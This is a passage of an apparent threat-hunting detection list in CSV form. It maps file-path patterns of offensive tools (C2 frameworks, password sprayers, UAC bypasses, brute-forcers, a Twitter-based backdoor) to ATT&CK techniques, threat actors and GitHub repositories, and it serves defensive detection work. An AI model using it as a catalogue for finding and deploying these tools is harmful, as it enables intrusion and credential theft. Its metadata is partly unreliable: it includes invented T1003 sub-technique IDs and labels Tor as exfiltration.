T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" +"*/TokenTactics.git*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/Tokenvator/*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*/tomcat-RH-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/tools/BeaconTool/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group 
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/tools/DHCP.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/tools/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Tools/spoolsystem/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*/Tools/Squeak/Squeak*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
+"*/Tool-X.git*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. 
Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/top_mots_combo.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z"
+"*/top-usernames-shortlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/tor-0.*.tar.gz*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/tor-gencert.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z"
+"*/traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/tracers_fuzzer.cc*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z"
+"*/trackerjacker*","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. 
Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Information Gathering","https://github.com/calebmadrigal/trackerjacker","1","0","N/A","N/A","10","2537","190","2020-12-24T20:53:31Z","2016-12-18T22:01:13Z"
+"*/Trackflaw/CVE*.py*","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","1","99","24","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z"
+"*/transports/scramblesuit/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*/TreeWalker.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD 
environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z"
+"*/TREVORspray.git*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*/trevorspray.log*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*/trganda/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z"
+"*/trick_ryuk.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
+"*/trickbot.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
+"*/tried_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
+"*/TriggerLinux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/trollsploit/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/TROUBLE-1/Vajra*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z"
+"*/trusted_sec_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/trusted_sec_remote_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*/trustedsec/*","offensive_tool_keyword","Github Username","github repo hosting various exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/trustedsec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/tso-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/tso-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/tweetshell.sh*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/SocialBox-Termux","1","1","N/A","7","10","2419","268","2023-07-14T10:59:10Z","2019-03-28T18:07:05Z"
+"*/twittor.git*","offensive_tool_keyword","twittor","A fully featured backdoor that uses Twitter as a C&C server ","T1105 - T1102 - T1041","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/PaulSec/twittor","1","1","N/A","10","10","743","254","2020-09-30T13:47:31Z","2015-09-09T07:23:25Z"
+"*/uac.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/UACBypasses/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
+"*/UACME.git*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 
- T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*/UAC-SilentClean/*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z"
+"*/uberfile.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*/ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/udmp-parser.git*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z"
+"*/umeshshinde19/instainsane*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","1","N/A","7","5","473","329","2023-08-22T21:49:22Z","2018-12-02T22:48:11Z"
